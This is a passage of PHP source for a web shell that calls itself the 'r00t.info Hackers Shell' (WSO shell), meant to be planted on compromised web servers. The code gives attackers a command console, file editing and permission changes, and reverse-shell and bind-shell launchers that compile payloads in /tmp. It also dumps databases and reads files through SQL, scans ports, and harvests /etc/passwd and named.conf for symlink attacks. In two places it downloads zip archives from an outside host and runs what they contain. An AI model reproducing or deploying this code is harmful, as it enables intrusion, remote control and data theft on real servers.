\'<span>Create time:</span> \'.date(\'Y-m-d H:i:s\',filectime($_POST[\'p1\'])).\' <span>Access time:</span> \'.date(\'Y-m-d H:i:s\',fileatime($_POST[\'p1\'])).\' <span>Modify time:</span> \'.date(\'Y-m-d H:i:s\',filemtime($_POST[\'p1\'])).\'<br><br>\';\r\n if( empty($_POST[\'p2\']) ) $_POST[\'p2\'] = \'view\';\r\n if( is_file($_POST[\'p1\']) ) $m = array(\'View\', \'Highlight\', \'Download\', \'Hexdump\', \'Edit\', \'Chmod\', \'Rename\', \'Touch\');\r\n else $m = array(\'Chmod\', \'Rename\', \'Touch\');\r\n foreach($m as $v) echo \'<a href=# onclick="g(null,null,null,\\\'\'.strtolower($v).\'\\\')">\'.((strtolower($v)==@$_POST[\'p2\'])?\'<b>[ \'.$v.\' ]</b>\':$v).\'</a> \';\r\n echo \'<br><br>\';\r\n switch($_POST[\'p2\']) { case \'view\': echo \'<pre class=ml1>\';\r\n $fp = @fopen($_POST[\'p1\'], \'r\');\r\n 
if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024));\r\n @fclose($fp);\r\n } echo \'</pre>\';\r\n break;\r\n case \'highlight\': if( is_readable($_POST[\'p1\']) ) { echo \'<div class=ml1 style="background-color: #e1e1e1;\r\ncolor:black;\r\n">\';\r\n $code = highlight_file($_POST[\'p1\'],true);\r\n echo str_replace(array(\'<span \',\'</span>\'), array(\'<font \',\'</font>\'),$code).\'</div>\';\r\n } break;\r\n case \'chmod\': if( !empty($_POST[\'p3\']) ) { $perms = 0;\r\n for($i=strlen($_POST[\'p3\'])-1;\r\n$i>=0;\r\n--$i) $perms += (int)$_POST[\'p3\'][$i]*pow(8, (strlen($_POST[\'p3\'])-$i-1));\r\n if(!@chmod($_POST[\'p1\'], $perms)) echo \'Can\\\'t set permissions!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n else die(\'<script>g(null,null,null,null,"")</script>\');\r\n } echo \'<form onsubmit="g(null,null,null,null,this.chmod.value);\r\nreturn false;\r\n"><input type=text name=chmod value="\'.substr(sprintf(\'%o\', fileperms($_POST[\'p1\'])),-4).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'edit\': if( !is_writable($_POST[\'p1\'])) { echo \'File isn\\\'t writeable\';\r\n break;\r\n } if( !empty($_POST[\'p3\']) ) { @file_put_contents($_POST[\'p1\'],$_POST[\'p3\']);\r\n echo \'Saved!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n } echo \'<form onsubmit="g(null,null,null,null,this.text.value);\r\nreturn false;\r\n"><textarea name=text class=bigarea>\';\r\n $fp = @fopen($_POST[\'p1\'], \'r\');\r\n if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024));\r\n @fclose($fp);\r\n } echo \'</textarea><input type=submit value=">>"></form>\';\r\n break;\r\n case \'hexdump\': $c = @file_get_contents($_POST[\'p1\']);\r\n $n = 0;\r\n $h = array(\'00000000<br>\',\'\',\'\');\r\n $len = strlen($c);\r\n for ($i=0;\r\n $i<$len;\r\n ++$i) { $h[1] .= sprintf(\'%02X\',ord($c[$i])).\' \';\r\n switch ( ord($c[$i]) ) { case 0: $h[2] .= \' \';\r\n break;\r\n case 9: $h[2] .= \' \';\r\n break;\r\n case 10: $h[2] .= 
\' \';\r\n break;\r\n case 13: $h[2] .= \' \';\r\n break;\r\n default: $h[2] .= $c[$i];\r\n break;\r\n } $n++;\r\n if ($n == 32) { $n = 0;\r\n if ($i+1 < $len) {$h[0] .= sprintf(\'%08X\',$i+1).\'<br>\';\r\n} $h[1] .= \'<br>\';\r\n $h[2] .= "\\n";\r\n } } echo \'<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;\r\n"><pre>\'.$h[0].\'</pre></span></td><td bgcolor=#282828><pre>\'.$h[1].\'</pre></td><td bgcolor=#333333><pre>\'.htmlspecialchars($h[2]).\'</pre></td></tr></table>\';\r\n break;\r\n case \'rename\': if( !empty($_POST[\'p3\']) ) { if(!@rename($_POST[\'p1\'], $_POST[\'p3\'])) echo \'Can\\\'t rename!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n else die(\'<script>g(null,null,"\'.urlencode($_POST[\'p3\']).\'",null,"")</script>\');\r\n } echo \'<form onsubmit="g(null,null,null,null,this.name.value);\r\nreturn false;\r\n"><input type=text name=name value="\'.htmlspecialchars($_POST[\'p1\']).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'touch\': if( !empty($_POST[\'p3\']) ) { $time = strtotime($_POST[\'p3\']);\r\n if($time) { if(@touch($_POST[\'p1\'],$time,$time)) die(\'<script>g(null,null,null,null,"")</script>\');\r\n else { echo \'Fail!<script>document.mf.p3.value="";\r\n</script>\';\r\n } } else echo \'Bad time format!<script>document.mf.p3.value="";\r\n</script>\';\r\n } echo \'<form onsubmit="g(null,null,null,null,this.touch.value);\r\nreturn false;\r\n"><input type=text name=touch value="\'.date("Y-m-d H:i:s", @filemtime($_POST[\'p1\'])).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'mkfile\': break;\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionBypass() { printHeader();\r\n if(!file_exists(\'cpanel/cpanel.php\')){ $dizin = \'https://byr00t.co/vb/cpanel.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? 
$name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "cpanel");\r\n $zip = new ZipArchive();\r\n $file = \'cpanel.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'cpanel/\');\r\n if(file_exists(\'cpanel.zip\')){ @unlink(\'cpanel.zip\');\r\n } if($cikar){ echo "<iframe src=cpanel/cpanel.php width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluştu.</div>\';\r\n } } elseif(file_exists(\'cpanel/cpanel.php\')){ echo "<iframe src=cpanel/cpanel.php width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionConsole() { if(isset($_POST[\'ajax\'])) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n echo "document.cf.cmd.value=\'\';\r\n\\n";\r\n $temp = @iconv($_POST[\'charset\'], \'UTF-8\', addcslashes("\\n$ ".$_POST[\'p1\']."\\n".ex($_POST[\'p1\']),"\\n\\r\\t\\\\\'\\0"));\r\n if(preg_match("!.*cd\\s+([^;\r\n]+)$!",$_POST[\'p1\'],$match)) { if(@chdir($match[1])) { $GLOBALS[\'cwd\'] = @getcwd();\r\n echo "document.mf.c.value=\'".$GLOBALS[\'cwd\']."\';\r\n";\r\n } } echo "document.cf.output.value+=\'".$temp."\';\r\n";\r\n echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;\r\n";\r\n $temp = ob_get_clean();\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n echo \'<script>\r\nif(window.Event) window.captureEvents(Event.KEYDOWN);\r\n\r\nvar cmds = new Array("");\r\n\r\nvar cur = 0;\r\n\r\nfunction kp(e) {\r\n var n = (window.Event) ? 
e.which : e.keyCode;\r\n\r\n if(n == 38) {\r\n cur--;\r\n\r\n if(cur>=0)\r\n document.cf.cmd.value = cmds[cur];\r\n\r\n else\r\n cur++;\r\n\r\n } else if(n == 40) {\r\n cur++;\r\n\r\n if(cur < cmds.length)\r\n document.cf.cmd.value = cmds[cur];\r\n\r\n else\r\n cur--;\r\n\r\n }\r\n}\r\nfunction add(cmd) {\r\n cmds.pop();\r\n\r\n cmds.push(cmd);\r\n\r\n cmds.push("");\r\n\r\n cur = cmds.length-1;\r\n\r\n}\r\n</script>\';\r\n echo \'<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\\\'clear\\\'){document.cf.output.value=\\\'\\\';\r\ndocument.cf.cmd.value=\\\'\\\';\r\nreturn false;\r\n}add(this.cmd.value);\r\nif(this.ajax.checked){a(null,null,this.cmd.value);\r\n}else{g(null,null,this.cmd.value);\r\n} return false;\r\n"><select name=alias>\';\r\n foreach($GLOBALS[\'aliases\'] as $n => $v) { if($v == \'\') { echo \'<optgroup label="-\'.htmlspecialchars($n).\'-"></optgroup>\';\r\n continue;\r\n } echo \'<option value="\'.htmlspecialchars($v).\'">\'.$n.\'</option>\';\r\n } if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo \'</select><input type=button onclick="add(document.cf.alias.value);\r\nif(document.cf.ajax.checked){a(null,null,document.cf.alias.value);\r\n}else{g(null,null,document.cf.alias.value);\r\n}" value=">>"> <input type=checkbox name=ajax value=1 \'.($_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;\r\n" readonly>\';\r\n if(!empty($_POST[\'p1\'])) { echo htmlspecialchars("$ ".$_POST[\'p1\']."\\n".ex($_POST[\'p1\']));\r\n } echo \'</textarea><input type=text name=cmd style="border-top:0;\r\nwidth:100%;\r\n" onkeydown="kp(event);\r\n">\';\r\n echo \'</form></div><script>document.cf.cmd.focus();\r\n</script>\';\r\n printFooter();\r\n } function actionLogout() { unset($_SESSION[md5($_SERVER[\'HTTP_HOST\'])]);\r\n echo \'\r\n <!--r00t.info Hackers Shell-->\r\n 
<!--Recoded by: Smurfie-->\r\n\r\n\r\n <script>alert("Logout Successful")</script>\r\n <body bgcolor=#ffffff><center><img src="http://r00t.info/shell-dosyalar/logo.png"></center>\r\n <H1><center><p style="color: #DF0101" >r00t.info Hackers Shell</p></H1>\r\n <center>\r\n<iframe src="http://www.facebook.com/plugins/likebox.php?\r\nhref=https://www.facebook.com/r00t.info&amp;\r\nwidth=260&amp;\r\ncolorsche\r\nme=light&amp;\r\nshow_faces=true&amp;\r\nborder_color=\r\n%23fff&amp;\r\nstream=false&amp;\r\nheader=false&amp;\r\nheight=100" scrolling="no" \r\nframeborder="0" style="background:transparent;\r\n border:none;\r\n overflow:hidden;\r\n width:200px;\r\n \r\nheight:100px;\r\n" allowtransparency="true"></iframe></center>\r\n <H3><marquee scrollamount="5" scrolldelay="50" width="100%"><p style="color: #DF0101" >Wso shell</p></marquee></H3></body>\';\r\n } function actionSelfRemove() { printHeader();\r\n if($_POST[\'p1\'] == \'yes\') { if(@unlink(SELF_PATH)) die(\'Shell has been removed\');\r\n else echo \'unlink error!\';\r\n } echo \'<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\\\'yes\\\')">Yes</a></div>\';\r\n printFooter();\r\n } function actionCgi() { printHeader();\r\n if(!file_exists(\'cgi/rot.cin\')){ $dizin = \'https://byr00t.co/vb/cgi.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? 
$name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "cgi");\r\n $zip = new ZipArchive();\r\n $file = \'cgi.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'cgi/\');\r\n if(file_exists(\'cgi.zip\')){ @unlink(\'cgi.zip\');\r\n } if($cikar){ chmod(\'cgi/rot.cin\', 0755);\r\n echo "<iframe src=cgi/rot.cin width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluştu.</div>\';\r\n } } elseif(file_exists(\'cgi/rot.cin\')){ echo "<iframe src=cgi/rot.cin width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionSql() { class DbClass { var $type;\r\n var $link;\r\n var $res;\r\n function DbClass($type) { $this->type = $type;\r\n } function connect($host, $user, $pass, $dbname){ switch($this->type) { case \'mysql\': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;\r\n break;\r\n case \'pgsql\': $host = explode(\':\', $host);\r\n if(!$host[1]) $host[1]=5432;\r\n if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;\r\n break;\r\n } return false;\r\n } function selectdb($db) { switch($this->type) { case \'mysql\': if (@mysql_select_db($db))return true;\r\n break;\r\n } return false;\r\n } function query($str) { switch($this->type) { case \'mysql\': return $this->res = @mysql_query($str);\r\n break;\r\n case \'pgsql\': return $this->res = @pg_query($this->link,$str);\r\n break;\r\n } return false;\r\n } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res;\r\n 
switch($this->type) { case \'mysql\': return @mysql_fetch_assoc($res);\r\n break;\r\n case \'pgsql\': return @pg_fetch_assoc($res);\r\n break;\r\n } return false;\r\n } function listDbs() { switch($this->type) { case \'mysql\': return $this->res = @mysql_list_dbs($this->link);\r\n break;\r\n case \'pgsql\': return $this->res = $this->query("SELECT datname FROM pg_database");\r\n break;\r\n } return false;\r\n } function listTables() { switch($this->type) { case \'mysql\': return $this->res = $this->query(\'SHOW TABLES\');\r\n break;\r\n case \'pgsql\': return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != \'information_schema\' AND table_schema != \'pg_catalog\') or table_name = \'pg_user\'");\r\n break;\r\n } return false;\r\n } function error() { switch($this->type) { case \'mysql\': return @mysql_error($this->link);\r\n break;\r\n case \'pgsql\': return @pg_last_error($this->link);\r\n break;\r\n } return false;\r\n } function setCharset($str) { switch($this->type) { case \'mysql\': if(function_exists(\'mysql_set_charset\')) return @mysql_set_charset($str, $this->link);\r\n else $this->query(\'SET CHARSET \'.$str);\r\n break;\r\n case \'mysql\': return @pg_set_client_encoding($this->link, $str);\r\n break;\r\n } return false;\r\n } function dump($table) { switch($this->type) { case \'mysql\': $res = $this->query(\'SHOW CREATE TABLE `\'.$table.\'`\');\r\n $create = mysql_fetch_array($res);\r\n echo $create[1].";\r\n\\n\\n";\r\n $this->query(\'SELECT * FROM `\'.$table.\'`\');\r\n while($item = $this->fetch()) { $columns = array();\r\n foreach($item as $k=>$v) { $item[$k] = "\'".@mysql_real_escape_string($v)."\'";\r\n $columns[] = "`".$k."`";\r\n } echo \'INSERT INTO `\'.$table.\'` (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\r\n\'."\\n";\r\n } break;\r\n case \'pgsql\': $this->query(\'SELECT * FROM \'.$table);\r\n while($item = $this->fetch()) { $columns = array();\r\n foreach($item as 
$k=>$v) { $item[$k] = "\'".addslashes($v)."\'";\r\n $columns[] = $k;\r\n } echo \'INSERT INTO \'.$table.\' (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\r\n\'."\\n";\r\n } break;\r\n } return false;\r\n } };\r\n $db = new DbClass(@$_POST[\'type\']);\r\n if(@$_POST[\'p2\']==\'download\') { ob_start("ob_gzhandler", 4096);\r\n $db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\']);\r\n $db->selectdb($_POST[\'sql_base\']);\r\n header("Content-Disposition: attachment;\r\n filename=dump.sql");\r\n header("Content-Type: text/plain");\r\n foreach($_POST[\'tbl\'] as $v) $db->dump($v);\r\n exit;\r\n } printHeader();\r\n echo \'<h1>Sql browser</h1><div class=content>\r\n <form name="sf" method="post">\r\n <table cellpadding="2" cellspacing="0">\r\n <tr>\r\n <td>Type</td>\r\n <td>Host</td>\r\n <td>Login</td>\r\n <td>Password</td>\r\n <td>Database</td>\r\n <td></td>\r\n </tr>\r\n <tr>\r\n <input type=hidden name=a value=Sql>\r\n <input type=hidden name=p1 value=\\\'query\\\'>\r\n <input type=hidden name=p2>\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <td>\r\n <select name=\\\'type\\\'>\r\n <option value="mysql" \'.(@$_POST[\'type\']==\'mysql\'?\'selected\':\'\').\'>MySql</option>\r\n <option value="pgsql" \'.(@$_POST[\'type\']==\'pgsql\'?\'selected\':\'\').\'>PostgreSql</option>\r\n </select></td>\r\n <td><input type=text name=sql_host value="\'.(empty($_POST[\'sql_host\'])?\'localhost\':htmlspecialchars($_POST[\'sql_host\'])).\'"></td>\r\n <td><input type=text name=sql_login value="\'.(empty($_POST[\'sql_login\'])?\'root\':htmlspecialchars($_POST[\'sql_login\'])).\'"></td>\r\n <td><input type=text name=sql_pass value="\'.(empty($_POST[\'sql_pass\'])?\'\':htmlspecialchars($_POST[\'sql_pass\'])).\'"></td>\r\n <td>\';\r\n $tmp = "<input type=text name=sql_base 
value=\'\'>";\r\n if(isset($_POST[\'sql_host\'])){ if($db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\'])) { switch($_POST[\'charset\']) { case "Windows-1251": $db->setCharset(\'cp1251\');\r\n break;\r\n case "UTF-8": $db->setCharset(\'utf8\');\r\n break;\r\n case "KOI8-R": $db->setCharset(\'koi8r\');\r\n break;\r\n case "KOI8-U": $db->setCharset(\'koi8u\');\r\n break;\r\n case "cp866": $db->setCharset(\'cp866\');\r\n break;\r\n } $db->listDbs();\r\n echo "<select name=sql_base><option value=\'\'></option>";\r\n while($item = $db->fetch()) { list($key, $value) = each($item);\r\n echo \'<option value="\'.$value.\'" \'.($value==$_POST[\'sql_base\']?\'selected\':\'\').\'>\'.$value.\'</option>\';\r\n } echo \'</select>\';\r\n } else echo $tmp;\r\n }else echo $tmp;\r\n echo \'</td>\r\n <td><input type=submit value=">>"></td>\r\n </tr>\r\n </table>\r\n <script>\r\n function st(t,l) {\r\n document.sf.p1.value = \\\'select\\\';\r\n\r\n document.sf.p2.value = t;\r\n\r\n if(l!=null)document.sf.p3.value = l;\r\n\r\n document.sf.submit();\r\n\r\n }\r\n function is() {\r\n for(i=0;\r\ni<document.sf.elements[\\\'tbl[]\\\'].length;\r\n++i)\r\n document.sf.elements[\\\'tbl[]\\\'][i].checked = !document.sf.elements[\\\'tbl[]\\\'][i].checked;\r\n\r\n }\r\n </script>\';\r\n if(isset($db) && $db->link){ echo "<br/><table width=100% cellpadding=2 cellspacing=0>";\r\n if(!empty($_POST[\'sql_base\'])){ $db->selectdb($_POST[\'sql_base\']);\r\n echo "<tr><td width=1 style=\'border-top:2px solid #666;\r\nborder-right:2px solid #666;\r\n\'><span>Tables:</span><br><br>";\r\n $tbls_res = $db->listTables();\r\n while($item = $db->fetch($tbls_res)) { list($key, $value) = each($item);\r\n $n = $db->fetch($db->query(\'SELECT COUNT(*) as n FROM \'.$value.\'\'));\r\n $value = htmlspecialchars($value);\r\n echo "<nobr><input type=\'checkbox\' name=\'tbl[]\' value=\'".$value."\'>&nbsp;\r\n<a href=# onclick=\\"st(\'".$value."\')\\">".$value."</a> 
(".$n[\'n\'].")</nobr><br>";\r\n } echo "<input type=\'checkbox\' onclick=\'is();\r\n\'> <input type=button value=\'Dump\' onclick=\'document.sf.p2.value=\\"download\\";\r\ndocument.sf.submit();\r\n\'></td><td style=\'border-top:2px solid #666;\r\n\'>";\r\n if(@$_POST[\'p1\'] == \'select\') { $_POST[\'p1\'] = \'query\';\r\n $db->query(\'SELECT COUNT(*) as n FROM \'.$_POST[\'p2\'].\'\');\r\n $num = $db->fetch();\r\n $num = $num[\'n\'];\r\n echo "<span>".$_POST[\'p2\']."</span> ($num) ";\r\n for($i=0;\r\n$i<($num/30);\r\n$i++) if($i != (int)$_POST[\'p3\']) echo "<a href=\'#\' onclick=\'st(\\"".$_POST[\'p2\']."\\", $i)\'>",($i+1),"</a> ";\r\n else echo ($i+1)," ";\r\n if($_POST[\'type\']==\'pgsql\') $_POST[\'p3\'] = \'SELECT * FROM \'.$_POST[\'p2\'].\' LIMIT 30 OFFSET \'.($_POST[\'p3\']*30);\r\n else $_POST[\'p3\'] = \'SELECT * FROM `\'.$_POST[\'p2\'].\'` LIMIT \'.($_POST[\'p3\']*30).\',30\';\r\n echo "<br><br>";\r\n } if((@$_POST[\'p1\'] == \'query\') && !empty($_POST[\'p3\'])) { $db->query(@$_POST[\'p3\']);\r\n if($db->res !== false) { $title = false;\r\n echo \'<table width=100% cellspacing=0 cellpadding=2 class=main>\';\r\n $line = 1;\r\n while($item = $db->fetch()) { if(!$title) { echo \'<tr>\';\r\n foreach($item as $key => $value) echo \'<th>\'.$key.\'</th>\';\r\n reset($item);\r\n $title=true;\r\n echo \'</tr><tr>\';\r\n $line = 2;\r\n } echo \'<tr class="l\'.$line.\'">\';\r\n $line = $line==1?2:1;\r\n foreach($item as $key => $value) { if($value == null) echo \'<td><i>null</i></td>\';\r\n else echo \'<td>\'.nl2br(htmlspecialchars($value)).\'</td>\';\r\n } echo \'</tr>\';\r\n } echo \'</table>\';\r\n } else { echo \'<div><b>Error:</b> \'.htmlspecialchars($db->error()).\'</div>\';\r\n } } echo "<br><textarea name=\'p3\' style=\'width:100%;\r\nheight:100px\'>".@htmlspecialchars($_POST[\'p3\'])."</textarea><br/><input type=submit value=\'Execute\'>";\r\n echo "</td></tr>";\r\n } echo "</table></form><br/><form 
onsubmit=\'document.sf.p1.value=\\"loadfile\\";\r\ndocument.sf.p2.value=this.f.value;\r\ndocument.sf.submit();\r\nreturn false;\r\n\'><span>Load file</span> <input class=\'toolsInp\' type=text name=f><input type=submit value=\'>>\'></form>";\r\n if(@$_POST[\'p1\'] == \'loadfile\') { $db->query("SELECT LOAD_FILE(\'".addslashes($_POST[\'p2\'])."\') as file");\r\n $file = $db->fetch();\r\n echo \'<pre class=ml1>\'.htmlspecialchars($file[\'file\']).\'</pre>\';\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionNetwork() { printHeader();\r\n $back_connect_c="";\r\n $back_connect_p="";\r\n $bind_port_c="";\r\n $bind_port_p="";\r\n echo \'<h1>Network tools</h1><div class=content>\r\n <form name=\\\'nfp\\\' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);\r\nreturn false;\r\n">\r\n <br /><span>Bind port to /bin/sh</span><br/>\r\n Port: <input type=\\\'text\\\' name=\\\'port\\\' value=\\\'443\\\'> Password: <input type=\\\'text\\\' name=\\\'pass\\\' value=\\\'smurf\\\'> Using: <select name="using"><option value=\\\'bpc\\\'>C</option><option value=\\\'bpp\\\'>Perl</option></select> <input type=submit value=">>">\r\n </form>\r\n <form name=\\\'nfp\\\' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);\r\nreturn false;\r\n">\r\n <br /><br /><span>Back-connect to</span><br/>\r\n Server: <input type=\\\'text\\\' name=\\\'server\\\' value="\'.$_SERVER[\'REMOTE_ADDR\'].\'"> Port: <input type=\\\'text\\\' name=\\\'port\\\' value=\\\'443\\\'> Using: <select name="using"><option value=\\\'bcc\\\'>C</option><option value=\\\'bcp\\\'>Perl</option></select> <input type=submit value=">>">\r\n </form><br>\';\r\n if(isset($_POST[\'p1\'])) { function cf($f,$t) { $w=@fopen($f,"w") or @function_exists(\'file_put_contents\');\r\n if($w) { @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));\r\n @fclose($w);\r\n } } if($_POST[\'p1\'] == \'bpc\') { 
cf("/tmp/bp.c",$bind_port_c);\r\n $out = ex("gcc -o /tmp/bp /tmp/bp.c");\r\n @unlink("/tmp/bp.c");\r\n $out .= ex("/tmp/bp ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bp")."</pre>";\r\n } if($_POST[\'p1\'] == \'bpp\') { cf("/tmp/bp.pl",$bind_port_p);\r\n $out = ex(which("perl")." /tmp/bp.pl ".$_POST[\'p2\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bp.pl")."</pre>";\r\n } if($_POST[\'p1\'] == \'bcc\') { cf("/tmp/bc.c",$back_connect_c);\r\n $out = ex("gcc -o /tmp/bc /tmp/bc.c");\r\n @unlink("/tmp/bc.c");\r\n $out .= ex("/tmp/bc ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bc")."</pre>";\r\n } if($_POST[\'p1\'] == \'bcp\') { cf("/tmp/bc.pl",$back_connect_p);\r\n $out = ex(which("perl")." /tmp/bc.pl ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bc.pl")."</pre>";\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionPortScanner() { printHeader();\r\n echo \'<h1>Port Scanner</h1>\';\r\n echo \'<div class="content">\';\r\n echo \'<form action="" method="post">\';\r\n if(isset($_POST[\'host\']) && is_numeric($_POST[\'end\']) && is_numeric($_POST[\'start\'])){ $start = strip_tags($_POST[\'start\']);\r\n $end = strip_tags($_POST[\'end\']);\r\n $host = strip_tags($_POST[\'host\']);\r\n for($i = $start;\r\n $i<=$end;\r\n $i++){ $fp = @fsockopen($host, $i, $errno, $errstr, 3);\r\n if($fp){ echo \'Port \'.$i.\' is <font color=green>open</font><br>\';\r\n } flush();\r\n } } else { echo \'<br /><br /><center><input type="hidden" name="a" value="PortScanner"><input type="hidden" name=p1><input type="hidden" name="p2">\r\n <input type="hidden" name="c" value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type="hidden" name="charset" value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n Host: <input type="text" name="host" value="localhost"/><br /><br />\r\n Port start: <input 
type="text" name="start" value="0"/><br /><br />\r\n Port end:<input type="text" name="end" value="5000"/><br /><br />\r\n <input type="submit" value="Scan Ports" />\r\n </form></center><br /><br />\';\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionReadable() { printHeader();\r\n echo \'<h1>Readable Dirs</h1>\';\r\n echo \'<div class="content">\';\r\n $sm = ini_get(\'safe_mode\');\r\n if($sm) { echo \'<br /><b>Error: safe_mode = on</b><br /><br />\';\r\n } else { @$passwd = fopen(\'/etc/passwd\',\'r\');\r\n if (!$passwd) { echo \'<br /><b>[-] Error : coudn`t read /etc/passwd</b><br /><br />\';\r\n } else { $pub = array();\r\n $users = array();\r\n $conf = array();\r\n $i = 0;\r\n while(!feof($passwd)) { $str = fgets($passwd);\r\n if ($i > 35) { $pos = strpos($str,\':\');\r\n $username = substr($str,0,$pos);\r\n $dirz = \'/home/\'.$username.\'/public_html/\';\r\n if (($username != \'\')) { if (is_readable($dirz)) { array_push($users,$username);\r\n array_push($pub,$dirz);\r\n } } } $i++;\r\n } echo \'<br><br>\';\r\n echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\\n"."<br />";\r\n echo "[+] Founded ".sizeof($pub)." 
readable public_html directories\\n"."<br /><br /><br />";\r\n foreach ($users as $user) { $path = "/home/$user/public_html/";\r\n echo $path."<br>";\r\n } echo "<br /><br /><br />[+] Complete...\\n"."<br />";\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionSymlink() { printHeader();\r\n echo \'<h1>Symlink</h1>\';\r\n $furl = \'http://\'.$_SERVER[\'SERVER_NAME\'].$_SERVER[\'REQUEST_URI\'];\r\n $expld = explode(\'/\',$furl );\r\n $burl =str_replace(end($expld),\'\',$furl);\r\n echo \'<div class="content"><center>\r\n <h3>[ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'website\\\',null)">Domains</a> ] - \r\n [ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'whole\\\',null)">Whole Server Symlink</a> ] - \r\n [ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'config\\\',null)">Config files symlink</a> ]</h3></center>\';\r\n if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'website\') { echo "<center>";\r\n $d0mains = @file("/etc/named.conf");\r\n if(!$d0mains){ echo "<pre class=ml1 style=\'margin-top:5px\'>Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=center class=\'main\' border=0 ><tr><th> Count </th><th> Domains </th><th> Users </th></tr>";\r\n $unk = array();\r\n foreach($d0mains as $d0main){ if(@eregi("zone",$d0main)){ preg_match_all(\'#zone "(.*)"#\', $d0main, $domains);\r\n flush();\r\n if(strlen(trim($domains[1][0])) > 2){ $unk[] = $domains[1][0];\r\n flush();\r\n } } } $count=1;\r\n $unk = array_unique($unk);\r\n $l=0;\r\n foreach($unk as $d){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$d));\r\n echo "<tr".($l?\' class=l1\':\'\')."><td>".$count."</td><td><a href=http://".$d."/>".$d."</a></td><td>".$user[\'name\']."</td></tr>";\r\n flush();\r\n $count++;\r\n 